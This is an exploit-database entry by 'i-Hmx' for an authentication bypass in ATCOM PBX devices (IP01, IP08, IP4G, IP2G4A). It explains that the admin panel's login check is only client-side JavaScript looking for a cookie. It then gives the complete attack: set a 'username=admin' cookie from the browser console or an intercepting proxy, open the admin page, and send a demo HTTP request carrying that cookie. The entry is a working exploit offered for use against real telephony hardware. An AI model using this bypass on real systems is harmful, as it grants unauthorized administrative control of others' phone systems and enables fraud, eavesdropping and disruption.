ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass

ID 1337DAY-ID-25110
Type zdt
Reporter i-Hmx
Modified 2016-06-16T00:00:00


Exploit for hardware platform in category web applications

                                            # Title: ATCOM PBX system , auth bypass exploit
# Author: i-Hmx
# contact : [email protected]
# Home :
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A
The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access
The security check is really stupid , depend on js
affected lines
function alertWithoutLogin(){
    var username = getCookie("username");
        alert('Sorry, permission denied. Please login first!');
so actually it just check if username value exist in cookies
and if not , redirect to login.html
just like that!!!!!!!!!!!!!
just from browser , press f12 , open console
type document.cookie="username=admin"
or from burp intercept proxy and set the cookies as well
go to ip/admin/index.html
and you are in , simple like that :/
Demo request
GET /admin/index.html HTTP/1.1
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: username=admin
Connection: close
Upgrade-Insecure-Requests: 1
From Eg-R1z with love

# [2018-01-05]  #